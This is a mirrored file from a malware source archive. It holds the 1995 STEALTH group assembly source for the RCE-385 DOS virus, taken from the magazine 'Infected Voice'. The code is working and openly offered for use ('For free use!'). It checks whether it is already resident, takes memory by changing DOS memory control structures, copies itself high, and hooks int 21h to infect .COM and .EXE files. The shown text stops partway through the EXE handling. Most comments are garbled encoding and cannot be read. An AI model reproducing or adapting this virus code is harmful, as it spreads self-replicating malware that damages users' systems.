mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
391 lines
18 KiB
NASM
391 lines
18 KiB
NASM
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B> STEALTH group ۰ <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20> <20> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><> <20><>
|
|||
|
;<3B> presents ۰ <20> <20> <20> <20><> <20><> <20> <20> <20><> <20> <20> <20> <20> <20> <20> <20> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۰ <20> <20> <20> <20> <20><><EFBFBD> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JAN 1995
|
|||
|
;
|
|||
|
; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
|
|||
|
; THE FIRST UNIQUE VIRUS MAGAZINE IN FORMER U.S.S.R.!!!
|
|||
|
;
|
|||
|
;--- RCE-385 (!).-------------------------------------------------------------
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>६<EFBFBD><E0A5AC><EFBFBD> <20><>諨 - <20><><EFBFBD><EFBFBD><EFA2A8><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>誠 <20><><EFBFBD>⮢<EFBFBD><E2AEA2> <20> <20><><EFBFBD><EFBFBD>ᠫ <>
|
|||
|
;<3B><><EFBFBD>⮢᪨ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> AdInf -> <20><> <20> <20><><EFBFBD> <20><> ⥯<><E2A5AF><EFBFBD>?<3F>-<2D><>,⥯<><E2A5AF><EFBFBD> ᨤ<><E1A8A4> <20><> <20><>孮<EFBFBD><E5ADAE><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B> <20>⥭<EFBFBD><E2A5AD><EFBFBD> <20><> ⥬ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>६<EFBFBD><E0A5AC><EFBFBD><EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20> <><EEA7A5> 楫<><E6A5AB> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>設<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>,
|
|||
|
;<3B> <20><> - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><>맦<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD> ⠪<><E2A0AA> <20><><EFBFBD>३ <20> RAM<41>.
|
|||
|
; <20> ⥯<><E2A5AF><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>⠢<EFBFBD><E2A0A2><EFBFBD> <20>ਬ<EFBFBD>祪 <20><>直<EFBFBD> - <20><><EFBFBD><EFBFBD> <20><><EFBFBD>,<2C>ࠧ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!<21><><EFBFBD><EFBFBD> <20>⥫<EFBFBD><E2A5AB>
|
|||
|
;<3B>ਧ<EFBFBD><E0A8A7>㬠<EFBFBD><E3ACA0><EFBFBD><EFBFBD> : "<22> 祣<> <20><><EFBFBD> <20><> ᤥ<><E1A4A5> ⥫<> <> ᮪<>뢠<EFBFBD><EBA2A0>,<2C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> *beep <20>
|
|||
|
;*beep".<2E> <20> <20><><EFBFBD> <20><><EFBFBD> <20><>襫 ࠧ<><E0A0A7><EFBFBD> <20> <20>।<EFBFBD> <20><>ଠ<EFBFBD><E0ACA0><EFBFBD>.<2E><><EFBFBD> <20>।<EFBFBD><E0A5A4><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>뫮 <20> <20><><EFBFBD><EFBFBD>饭-
|
|||
|
;<3B><><EFBFBD> ०<><E0A5A6> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ⥬ ᠬ<><E1A0AC> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>襢<EFBFBD><E8A5A2><EFBFBD>
|
|||
|
;<3B><><EFBFBD>頥<EFBFBD> <20><><EFBFBD> ॠ<>樨 <20><>⥪<EFBFBD><E2A5AA><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>饣<EFBFBD>,<2C><>設<EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
;<3B><> *beep <20><><EFBFBD>᪠<EFBFBD><E1AAA0>!<21><> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> *beep<65><70>!<21><><EFBFBD><EFBFBD><EFBFBD>蠩<EFBFBD><E8A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ଠ<EFBFBD><E0ACA0> --
|
|||
|
;<3B><> <20> <20><>ࠦ<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⬠!!!<21><>堩 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><>直<EFBFBD><EFAAA8>
|
|||
|
;ॢ<><E0A5A2><EFBFBD>ࠬ<EFBFBD>,<2C><><EFBFBD><EFBFBD><EFBFBD> <20><>ଠ<EFBFBD><E0ACA0><EFBFBD> <> <> <20><><EFBFBD><EFBFBD><EFBFBD>.<2E><> 祬 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> ⥬ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> !
|
|||
|
;(<28><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>뫨 Basic).<2E> <20><>稫<EFBFBD><E7A8AB> <20><>直<EFBFBD> - <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> "<22><>ᠤ<EFBFBD><E1A0A4>"!
|
|||
|
; <20><> ᨥ <20><><EFBFBD> 梥<><E6A2A5>窠<EFBFBD><E7AAA0> <20><><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD><EFBFBD>!<21> <20><><EFBFBD> <20>।<EFBFBD>⠢<EFBFBD><E2A0A2> ᥡ<>,<2C><><EFBFBD> <20><><EFBFBD>諥<EFBFBD><E8ABA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>ࢮ<EFBFBD> <> <20>ந<EFBFBD><E0AEA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C> <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> ⥮ਨ <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD>襩-<2D><>ଠ<EFBFBD><E0ACA0><EFBFBD>!<21><><EFBFBD> <20> <20><><EFBFBD>諮<EFBFBD><E8ABAE> <20><><EFBFBD> <20><><EFBFBD>⠢<EFBFBD><E2A0A2><EFBFBD><EFBFBD> <20><>ᮡ<EFBFBD><E1AEA1>-<2D><><EFBFBD>-<2D><>稭<EFBFBD><E7A8AD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
;<3B><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> RCE-666 (<28><><EFBFBD><EFBFBD> <20><>ᠭ).Aidstest <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: INFO /666,Web: Die-666.
|
|||
|
;<3B><> <20><>⮬ <20><>१<EFBFBD><E0A5A7> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>쪮,<2C><><EFBFBD><EFBFBD>稫 <20> RCE-385!
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>窮<EFBFBD>- <20>祡<EFBFBD><E7A5A1><EFBFBD><EFBFBD><EFBFBD> <20>⠭<EFBFBD><E2A0AD>,<2C> <20><><EFBFBD> <20><>ᯮ<EFBFBD> <20><><EFBFBD><EFBFBD> - <20><><EFBFBD>⮩-
|
|||
|
;<3B><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;(c) Light General.Kiev.1995. STEALTH group . For free use!
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
cseg segment
|
|||
|
assume cs:cseg,ds:cseg
|
|||
|
org 100h
|
|||
|
start:
|
|||
|
nop ; <20>ਧ<EFBFBD><E0A8A7><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD> .COM 䠩<><E4A0A9>.
|
|||
|
jmp virr
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>.(<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 30 <20><><EFBFBD><EFBFBD>).
|
|||
|
nop
|
|||
|
nop
|
|||
|
mov ah,09
|
|||
|
lea dx,wrn
|
|||
|
int 21h
|
|||
|
mov ax,4c00h
|
|||
|
int 21h
|
|||
|
;--------------------------------------
|
|||
|
wrn db 'FRODO LIVES!$'
|
|||
|
;--------------------------------------
|
|||
|
|
|||
|
;################# VIRUS ##################
|
|||
|
|
|||
|
virr:
|
|||
|
call $+3
|
|||
|
pop si
|
|||
|
sub si,03
|
|||
|
;-Hacked mem.-----------------------------------------------------
|
|||
|
push si
|
|||
|
clc
|
|||
|
mov ax,0FEFEh ; <20><EFBFBD><E0AEA2>塞 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
int 21h ; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> ᨤ<><E1A8A4> <20> <20><>設<EFBFBD> <20><> <20><>
|
|||
|
jc exit_v ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䫠<> CF!
|
|||
|
;- <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20>ந<EFBFBD><E0AEA8><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD>" 512 <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!-------------
|
|||
|
; <20>ਭ樯 <20>⮣<EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD>" <20>᭮<EFBFBD>뢠<EFBFBD><EBA2A0><EFBFBD><EFBFBD> <20><> ⮬,<2C><><EFBFBD> <20><><EFBFBD> <20>믮<EFBFBD><EBAFAE><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>
|
|||
|
;<3B><><EFBFBD>⥬<EFBFBD> <20><>ந<EFBFBD> <20><>। <20><> <20><><EFBFBD><EFBFBD><EFBFBD> ⠪<><E2A0AA> <20><><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20>뤥<EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
;---(1)--- MCB - Memory Control Block (<28><><EFBFBD><EFBFBD> <20><>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
; <20><><EFBFBD>筮 <20> ⠪<><E2A0AA> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> DOS <20><><EFBFBD><EFBFBD>뢠<EFBFBD><EBA2A0> <20>뤥<EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC><EFBFBD> <20><><EFBFBD><EFBFBD>⪨ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD>饭<EFBFBD><E9A5AD> <20>祩<EFBFBD><E7A5A9> <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>祭<EFBFBD><E7A5AD>
|
|||
|
; <20><>砫<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>. <20> <20>
|
|||
|
; <20> <20>
|
|||
|
; 00 <20> 1b <20> <20> <20>⮨<EFBFBD> 'M' <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD>
|
|||
|
; <20> <20> 'Z' <20><><EFBFBD><E1ABA5><EFBFBD><EFBFBD>.
|
|||
|
; 01 <20> 1w <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> (<28> <20><><EFBFBD><EFBFBD>ண<EFBFBD> <20>뤥<EFBFBD><EBA4A5><EFBFBD> <20><><EFBFBD><EFBFBD>).
|
|||
|
;++++> 03 <20> 1w <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><>ࠣ<EFBFBD><E0A0A3><EFBFBD><EFBFBD><EFBFBD> (<28><>ࠣ<EFBFBD><E0A0A3><EFBFBD> = 16 <20><><EFBFBD><EFBFBD>)
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ⮫쪮 <20><><EFBFBD>! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;
|
|||
|
;---(2)--- PSP - Program Segment Prefix (<28><><EFBFBD>䨪<EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC><EFBFBD><EFBFBD><EFBFBD> ᥣ<><E1A5A3><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> ᮤ<>ন<EFBFBD><E0A6A8><EFBFBD> <20><><EFBFBD><EFBFBD>ଠ<EFBFBD><E0ACA0><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD>᪠<EFBFBD><E1AAA0><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>!
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD>饭<EFBFBD><E9A5AD> <20>祩<EFBFBD><E7A5A9> <20><> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>祭<EFBFBD><E7A5AD>
|
|||
|
; <20><>砫<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>. <20> <20>
|
|||
|
; <20> <20>
|
|||
|
; 00 <20> 1w <20> <20> <20>⮬ <><E1ABAE> <20>⮨<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> int 20h (CD 20h)
|
|||
|
;++++> 02 <20> 1w <20> <20><>騩 ࠧ<><E0A0A7><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>뤥<EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>ணࠬ<E0AEA3><E0A0AC>!
|
|||
|
; <20> <20> (<28><><EFBFBD> <20><><EFBFBD><EFBFBD>᪥ <20>ணࠬ<E0AEA3><E0A0AC> DOS <20>뤥<EFBFBD><EBA4A5><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>
|
|||
|
; <20> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><> <20><><EFBFBD><EFBFBD><EFBFBD>" 640 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!)
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>騥 <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
;-- <20><><EFBFBD> <20><><EFBFBD>,<2C>⭨<EFBFBD><E2ADA8><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>祭<EFBFBD><E7A5AD> <20><> <20>뤥<EFBFBD><EBA4A5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20>祥<EFBFBD>,<2C><> <20><><EFBFBD><EFBFBD><EFBFBD> ᤥ<><E1A4A5><EFBFBD><EFBFBD>
|
|||
|
;"<22><><EFBFBD><EFBFBD><EFBFBD>" <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><>७<EFBFBD><E0A5AD><EFBFBD><EFBFBD> <20>㤠 ⥫<> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
; <20>ࠪ<EFBFBD><E0A0AA><EFBFBD><EFBFBD>᪠<EFBFBD> ॠ<><E0A5A0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :
|
|||
|
mov ax,ds
|
|||
|
dec ax
|
|||
|
mov es,ax
|
|||
|
sub word ptr es:[03],35 ;* 512b
|
|||
|
sub word ptr ds:[02],35 ;* 512b
|
|||
|
mov es,ds:[02] ; ES = ᥣ<><E1A5A3><EFBFBD><EFBFBD><EFBFBD>. <20><><EFBFBD>. "<22><><EFBFBD><EFBFBD><EFBFBD>." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
push ds cs
|
|||
|
pop ds
|
|||
|
xor di,di
|
|||
|
mov cx,offset ax_len-offset virr ; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
rep movsb ; <20><>७<EFBFBD>ᨬ <20><><EFBFBD><EFBFBD><EFBFBD> <20> "<22><><EFBFBD>." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
;-Install int.----------------------------------------------------
|
|||
|
mov al,21h
|
|||
|
mov dx,offset int_21h_entry-offset virr
|
|||
|
mov si,offset ofs_21h-offset virr
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
call inst_int ; <20><>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> int 21h <20><> <>
|
|||
|
; <20><>ࠡ<EFBFBD><E0A0A1>稪.
|
|||
|
pop ds
|
|||
|
exit_v:
|
|||
|
push ds
|
|||
|
pop es
|
|||
|
pop si
|
|||
|
;- COM or EXE ?---------------------------------------------------
|
|||
|
; <20><EFBFBD>ਬ <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 䠩<><E4A0A9> <20><> <20><><EFBFBD><EFBFBD>⮢<EFBFBD><E2AEA2><EFBFBD>?
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>⮬<EFBFBD>,<2C><><EFBFBD> <20><>।<EFBFBD><E0A5A4><EFBFBD> <20><>ࠢ<EFBFBD><E0A0A2><EFBFBD><EFBFBD><EFBFBD> .COM <20><><EFBFBD> .EXE <20>ணࠬ<E0AEA3><E0A0AC>
|
|||
|
; <20>ந<EFBFBD>室<EFBFBD><E5AEA4> <20><> ࠧ<><E0A0A7><EFBFBD><EFBFBD>!
|
|||
|
cmp byte ptr cs:[si+offset origin_2_byte-offset virr+1],'Z'
|
|||
|
jz L_exe
|
|||
|
;-<2D>oc<6F>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20>.<2E>.-------------------------------------
|
|||
|
; <20> .COM 䠩<><E4A0A9> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>⠭<EFBFBD><E2A0AD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD> <20><>ࠦ<EFBFBD><E0A0A6><EFBFBD><EFBFBD> 䠩<><E4A0A9> <20><> <20><>᪥!(<28><> <20><><EFBFBD><EFBFBD>ᠫ<EFBFBD> <20>㤠 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>室<EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>).
|
|||
|
mov di,100h
|
|||
|
add si,offset origin_2_byte-offset virr
|
|||
|
; SI = <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20>ਣ<EFBFBD><E0A8A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>묨 <20><><EFBFBD>⠬<EFBFBD> .COM 䠩<><E4A0A9>!
|
|||
|
push di
|
|||
|
movsw
|
|||
|
movsw
|
|||
|
xor ax,ax
|
|||
|
ret ; Go to infected com program.
|
|||
|
;-Loaded from exe file.--------------------------------------------
|
|||
|
; <20> <20><><EFBFBD> <20><><EFBFBD> ᯮᮡ <20><>⨢<EFBFBD>樨 .EXE <20>ணࠬ<E0AEA3><E0A0AC>!
|
|||
|
